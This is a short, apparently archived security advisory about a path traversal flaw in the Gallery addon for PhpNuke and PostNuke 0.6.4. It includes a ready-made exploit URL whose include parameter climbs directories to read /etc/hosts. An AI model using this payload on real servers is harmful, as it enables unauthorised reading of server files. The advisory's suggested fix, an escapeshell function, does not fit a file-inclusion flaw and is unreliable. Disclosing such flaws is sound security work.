COMMAND

	Gallery Addon for PhpNuke, remote file access

SYSTEMS AFFECTED

	??

PROBLEM

	Aurélien Cabezon [http://www.iSecureLabs.com] found :
	

	

	[1] Description
	

	Gallery is an intuitive  web  based  photo  gallery  with  authenticated
	users  and  privileged  albums.  Photo  management  includes   automatic
	thumbnails, resizing, rotation, etc. Gallery is available as a Nuke  5.0
	module.
	

	Gallery Addon is vulnerable to the ../..  bug  that  allow  remote  file
	reading on the web server as whatever user runs the web server.
	

	[2] Exploit
	 

	http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&;

	name=gallery&file=index&inclu

	de=../../../../../../etc/hosts

	

	

	 update

	 ======

	 

	 postnuke 0.6.4  is also vulnerable

	

SOLUTION

	Coder has been alerted  [http://www.menalto.com/projects/gallery-nuke/].
	An easy way to fix such a vulnerability  is  to  use  the  PHP  included
	\"system escapeshell\" function.